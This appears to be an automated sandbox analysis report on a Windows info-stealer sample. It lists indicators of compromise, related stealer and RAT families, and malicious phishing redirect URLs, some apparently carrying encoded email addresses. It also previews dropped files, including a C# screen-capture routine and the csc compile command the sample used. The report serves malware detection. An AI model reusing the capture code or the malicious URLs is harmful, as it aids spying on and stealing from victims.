• Successful, ratio: 95%
• Number of executed functions: 127
• Number of non-executed functions: 177
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 142.250.186.67, 52.149.20.212, 20.3.187.198, 13.95.31.18, 40.69.42.241
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7608 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: HeilHitler.exe
Time | Type | Description
04:44:05 | API Interceptor | 113x Sleep call for process: powershell.exe modified
04:44:07 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1
  akame.exe | malicious | Blank Grabber
    • ip-api.com/line/?fields=hosting
  HBL,MBL CN MBL NO.OOLU274.exe | malicious | AgentTesla
    • ip-api.com/line/?fields=hosting
  8Hd0ZExgJz.exe | malicious | Blank Grabber, Umbral Stealer, XWorm
    • ip-api.com/line/?fields=hosting
  (#U0130TOSAM) 11 KASIM 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exe | malicious | AgentTesla
    • ip-api.com/line/?fields=hosting
  file.exe | malicious | Clipboard Hijacker
    • ip-api.com/line/
  file.exe | malicious | Clipboard Hijacker
    • ip-api.com/line/
  https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe | malicious | Unknown
    • ip-api.com/json
  file.exe | malicious | Amadey, Stealc, Vidar
    • ip-api.com/line/
  file.exe | malicious | Unknown
    • ip-api.com/line/
  file.exe | malicious | Unknown
    • ip-api.com/line/
162.159.128.233
  file.exe | malicious | LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT
    • discord.com/phpMyAdmin/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com
  akame.exe | malicious | Blank Grabber
    • 208.95.112.1
  HBL,MBL CN MBL NO.OOLU274.exe | malicious | AgentTesla
    • 208.95.112.1
  8Hd0ZExgJz.exe | malicious | Blank Grabber, Umbral Stealer, XWorm
    • 208.95.112.1
  (#U0130TOSAM) 11 KASIM 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exe | malicious | AgentTesla
    • 208.95.112.1
  file.exe | malicious | Clipboard Hijacker
    • 208.95.112.1
  file.exe | malicious | Clipboard Hijacker
    • 208.95.112.1
  https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe | malicious | Unknown
    • 208.95.112.1
  file.exe | malicious | Amadey, Stealc, Vidar
    • 208.95.112.1
  file.exe | malicious | Unknown
    • 208.95.112.1
  file.exe | malicious | Unknown
    • 208.95.112.1
discord.com
  file.exe | malicious | CStealer
    • 162.159.138.232
  B78DGDwttv.exe | malicious | SilverRat
    • 162.159.135.232
  YDW0S5K7hi.exe | malicious | SilverRat
    • 162.159.137.232
  cDRgXaadjD.exe | malicious | SilverRat
    • 162.159.128.233
  dens.exe | malicious | Python Stealer, Exela Stealer, Waltuhium Grabber
    • 162.159.128.233
  Xyq6rvzLJs.exe | malicious | SilverRat
    • 162.159.137.232
  00514DIRyT.exe | malicious | GO Stealer
    • 162.159.136.232
  yuki.exe | malicious | Luna Stealer
    • 162.159.138.232
  CFuejz2dRu.exe | malicious | Discord Token Stealer
    • 162.159.135.232
  CFuejz2dRu.exe | malicious | Discord Token Stealer
                                                                                                                                                                                                                      • 162.159.137.232
bg.microsoft.map.fastly.net | https://urlsand.esvalabs.com/?u=https%3A%2F%2Fwww.google.es%2Furl%3Fq%3Dquerydvj3%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253D%26sa%3Dt%26url%3Damp%252fsafrareal.com.br%252fyoya%252fcwvw6vvf1g5bqgkdfsxdiiczthvxp3de8xxbs%2FcG1lQGZlZGVnYXJpYXNpYS5jb20%3D%24%3F&e=24a2acfd&h=70c4a2f4&f=n&p=y | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | dekont_7083037 TÜRKİYE HALK BANKASI A.Ş pdf .exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 199.232.210.172
 | 5z3Wzl6uag.js | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | https://kunnskapsfilm.no | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | https://www.google.es/url?q=queryrp18(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fpreview.adope.jp%2fod%2f8gqnmo6zgfuuc6sej4k7rfdswihr8l%2fZnJhbnMuZW5nZWxicmVjaHRAYXJkYWdoZ3JvdXAuY29t$? | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | https://www.payceconsultings.com/#choonghoon.kim@hyundaielevator.com | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | http://tvdseo.com | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | https://www.google.ch/url?sa=https://r20.rs6.net/tns.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/afrotech2023.com%2Fdhj%2F4298727249/bmljay5zcHVybG9ja0BsZWcud2EuZ292 | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292 | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | http://www2.megawebfind.com | Get hash | malicious | Unknown | Browse | 199.232.214.172
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TUT-ASUS | akame.exe | Get hash | malicious | Blank Grabber | Browse | 208.95.112.1
 | HBL,MBL CN MBL NO.OOLU274.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
 | 8Hd0ZExgJz.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse | 208.95.112.1
 | (İTOSAM) 11 KASIM 2024 HAFTALIK EKONOMİ BÜLTENİ.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
 | file.exe | Get hash | malicious | Clipboard Hijacker | Browse | 208.95.112.1
 | file.exe | Get hash | malicious | Clipboard Hijacker | Browse | 208.95.112.1
 | https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 208.95.112.1
 | file.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
 | file.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
CLOUDFLARENETUS | Email_sending_restriction_[sebastien.morel!](#HOHSM).html | Get hash | malicious | Unknown | Browse | 172.67.151.164
 | ArenaWarsSetup.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | 9RM52QaURq.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.74.152
 | HZ1BUCfTne.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.74.152
 | 9RM52QaURq.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.74.152
 | bv2DbIiZeK.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.26.13.205
 | brozer.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.26.13.205
 | NewVoicemail - +1 392 504 7XXX00-33Rebecca.silvaTranscript.html | Get hash | malicious | Unknown | Browse | 104.16.123.96
 | YU7jHNMJjG.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.74.152
 | 6Ev0Nd7z2t.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.26.12.205
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\_MEI74322\VCRUNTIME140.dll | meN9qeS2DE.exe | Get hash | malicious | XWorm | Browse |
 | client1.exe | Get hash | malicious | Unknown | Browse |
 | qbE2mhhzCq.exe | Get hash | malicious | Blank Grabber | Browse |
 | UwOcZADSmi.exe | Get hash | malicious | AsyncRAT | Browse |
 | IyWKJMlCXg.exe | Get hash | malicious | XWorm | Browse |
 | SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe | Get hash | malicious | Python Stealer, CStealer | Browse |
 | JdHvcxG4Up.exe | Get hash | malicious | Unknown | Browse |
 | souFnS89FP.exe | Get hash | malicious | Unknown | Browse |
 | Bootstrapper V1.19.exe | Get hash | malicious | Python Stealer, Empyrean, Discord Token Stealer | Browse |
 | enigma.tech.exe | Get hash | malicious | Blank Grabber | Browse |
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 706852
Entropy (8bit): 7.928106029567756
Encrypted: false
SSDEEP: 12288:ye9t1uq13flvUiKLnInv/kk1hJ2v1JKDQHzfW4pgvW3BMJyAgmNUY6ykz9mCIqVW:TdvUi0nIHWHK0HNYWwgxlyMiqVW
MD5: 8C923F1FDA7DDA0541586BA8ED2963A6
SHA1: 3DA78AE128FF406F552C1701383FE4B927274F0E
SHA-256: ADA874D777202602B6F554C58C0546E0123745854E0557392693BABB3C3B187A
SHA-512: 00142FAC1AF225F2C6888AB2FD5CB3004D4DE62DB0E471D42B88D31558DFFE9D7CFCE93292167B9AC9C44FC09689097265A3E79728EEE72E9C206C22BEAFBF6C
Malicious: false
Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mWy....{t.p.{=.k..w..v....o..ZNm..r.PD..@.`r...t0..D..M..B.(g!.%....D..c.7....Y..U..N.....s...s..w..o.s.....v...'.....J+....Y?X.....F.+.......3zm...k....{....r_....32....^ug7z.w*...;+s.X....{M.,g..gx.7.(.]w......2....._.z.^x...g.....cl..=..+b...g.9..._#s.......^..ue./.<...s.~..=..1..~[7..[.0..[.2..).W....`.n.3../...nZ.s..q..+b.q.c..>?.M...\.c.....G..50.......l~T....?.S.....}...=....".m~.g+m.cc....a.w,q.)0....x..lz..K....u..\.my....Z..\W.....%.......aK....1w.5....3..r...T./.N..|F.....5..y...U...]=.m.......=N...t.+*.ek..8....jl.iWu[.WrN-..8.\..+......N....pY...z.ro%.X..r........[..<.....K...Me...^Z.../.m!..O...rb.w....../...w.8.....m'.}K?..n=...o...K..c........qe.....c/.....X.U..1..y[N.............g.Z>......cc..-..].<...c`n....e.`...OT6...2&..9.MG]Ti...Y.=.\..Ov.}....U.@l.....q.>l9.....^...vdYsD.;../.....C..6.Z.[.......s.*.y..|.......|

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1004
Entropy (8bit): 4.154581034278981
Encrypted: false
SSDEEP: 24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5: C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):607
                                                                                                                                                                                                                                          Entropy (8bit):5.340254418082675
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfghqGWZEifghqb:V3ka6KOkqeFkOfAqXEifAqb
                                                                                                                                                                                                                                          MD5:7CA9DDB3D3C7020F95E262DE8E79785E
                                                                                                                                                                                                                                          SHA1:4B16123C35BE29B7BE9EABC49572467A5798738A
                                                                                                                                                                                                                                          SHA-256:9C9F2DDFECC5EC881DF3D3A43480FC5E37D2645204D171AC360AD1A2FF89FB8F
                                                                                                                                                                                                                                          SHA-512:762E705AA6D675D39C535CA58D3AEC2FC8B676E7896EE7B31D78C2D23240BA16FC4964043A5111B1453E2D10944CF689FCA03EE1306A9E4222550E206817E4A6
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.0.cs"
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4096
                                                                                                                                                                                                                                          Entropy (8bit):3.156700678460479
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:6n7oEAtf0KhzBU/cLf6mtJxN0cKpW1ul8a3Aq:xNz0xm5OV6K
                                                                                                                                                                                                                                          MD5:FF289E468B5FB0D83A09CEFD6EA405AA
                                                                                                                                                                                                                                          SHA1:A172FE689F0B3A742F2AFECDC072A8F7761E2609
                                                                                                                                                                                                                                          SHA-256:4FDF4A82816F4684A976C24ED1689D921449D691433305D55A80A7A10526D4C4
                                                                                                                                                                                                                                          SHA-512:900D395C6B18833C5237A7D0B853943AEEE7EEB891B04CB2AB270E250A18034CB05F0EA25E93109AD7977E253E1F416DFC65C2F26DC10D3F70E4D8FC30277A58
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,7g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                          Size (bytes):1149
                                                                                                                                                                                                                                          Entropy (8bit):5.505653373118298
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:KJfCDId3ka6KOkqeFkOfAqXEifAqaKax5DqBVKVrdFAMBJTH:uCDkka6NkqeFkyAqXEuAqaK2DcVKdBJj
                                                                                                                                                                                                                                          MD5:A0DBBBDECF659C828F682B5809C3591D
                                                                                                                                                                                                                                          SHA1:95C3E4646BD1647A2146143463C190C4741574D7
                                                                                                                                                                                                                                          SHA-256:2A58FC37B295DC0C72E7C67DA9ABAD9850EDC1C761ED4CD9CA5FF1A0FFB37B54
                                                                                                                                                                                                                                          SHA-512:F4473A7B8391A00AA879AF7C4D359A072FD5FE1CB8E5654246685AF01DA63ABFC4B91386531314AE67470418CD086D8122E0F79E05122633724AE102B6573619
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):652
                                                                                                                                                                                                                                          Entropy (8bit):3.0898577234455193
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryOZ7ak7Ynqq1Z0PN5Dlq5J:+RI+ycuZhNQ7akSj0PNnqX
                                                                                                                                                                                                                                          MD5:7D99A02D00C1AFB7131A07A1D1FE79C7
                                                                                                                                                                                                                                          SHA1:64EB7C6A1194A65C26F30ACF4D2C1338D7C9DFB1
                                                                                                                                                                                                                                          SHA-256:4DAE0A5102300E958EB8755A76322CDFE301596B7161E2E181C24CA64DCC14E2
                                                                                                                                                                                                                                          SHA-512:6A498984E1A836E90CA3528FEBA46FCBB39FC75A902F6D3707EBADA0677CB6F0DC81789E6E55090E0E4D89BF911048D15E8EB54101EF29B044C4B05358F831EB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.q.d.p.b.r.p.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.q.d.p.b.r.p.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe
                                                                                                                                                                                                                                          File Type:RAR archive data, v5
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):758302
                                                                                                                                                                                                                                          Entropy (8bit):7.999764092234822
                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                          SSDEEP:12288:JSAFpA7A/CZpHv1DShasJFhSKwY3nvcO+EQiu5bte71fEHXmduVxxVcUSx:JS+pA7AwpH9DWJFhSgUOnK7XmdkxTsx
                                                                                                                                                                                                                                          MD5:870330AE8987734048A5AADBEB4CDB0C
                                                                                                                                                                                                                                          SHA1:4F951A472D79A50A58F1A706241943EF43364FAE
                                                                                                                                                                                                                                          SHA-256:6B2A572C82C7C8C13B6F2CB8F09CB7E749A7307CCDB3C8638A5261F109441226
                                                                                                                                                                                                                                          SHA-512:0A8A16A99FA5A9AED89D5CCCA523CF72A67281CD65D85312CB6009DFBBC2D2789062F50601F26257FF29E61689F79BC54F7C3620ACFC5CA726C11C088E5EB384
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:Rar!......B.!........../..43`~.r.>..VT..I+.......r....3J....&..e....71.$'4NYvy...`l6c....*(........\..{.w ...<......|...../.Z4.Q^].;v...U.@u?.p...R..X.-.t2.......f*$3S.....:#.$.9.i..R......dF....=(......V....yb.b...0..F,g.-...y.Sa #.R&.].F6.s..}....5.).G....9..W.|.L.D.........7....b..e.&V..wK...x.(.L-d...g.L9M..v...`4M4.bB.....,.....>.!.....E!.#.D..J. [.PC.|.{o|1...{G.y...s..p.I.F....d..x...n.89.p.;...i$%..m}Wy.>...'/F.....K..n.x.0.\D.S...u....z.d.}:.:..,......^.....(=W.So/`.p....|[..g...{A..4.?G.$..!...:8+].....O.U-...B[6B...$\d....Zse....../=.PY..}?.....jw.|.4.n(...I..7Q.G%.x..*..P..a...u.4...S....n..J.]!...5.Z.S..E.lt...sk./:..~....L.c..4<<U.-X...^...=..#.`.|,Y..._ ........u....w]...O.V5..h..cs..lNLG.N.....i.w...T...C.l~^..aW..n...8W3.I1.j.'...6R(}.."...........K.&H.D2..f.\..wUdB../g..MT...V......!W.R....6...`E.F..(........"Y,.:.H.*..-..k.*....t..%.].`.XM..0.......U...x0y.,1=.......c' M.Z.....0~..3:.w.....m!.'..u..[......}qx...[*.ez
                                                                                                                                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                          Size (bytes):894
                                                                                                                                                                                                                                          Entropy (8bit):3.1139899757233978
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:Q58KRBubdpkoPAGdjrG9sk9+MlWlLehW51ICV91:QOaqdmOFdjriv+kWResLI61
                                                                                                                                                                                                                                          MD5:9089C23EC6046B7BF3E3CEAC33C592C4
                                                                                                                                                                                                                                          SHA1:669E3FEA2A65BBC121A61876C71F319A58E72AE6
                                                                                                                                                                                                                                          SHA-256:8F89247527D24B06545863AB76F94461428C389C7B374FF543BB8D321529D87F
                                                                                                                                                                                                                                          SHA-512:BAC5E942E2156ECA428410A39DFC157F29B92CAA2ED8E8412D345ADA268DAE0FB08EECE34DE61C63966480A424F17316D1DBFC09CB1B6668F44D8B65B3907EAA
                                                                                                                                                                                                                                          Malicious:false
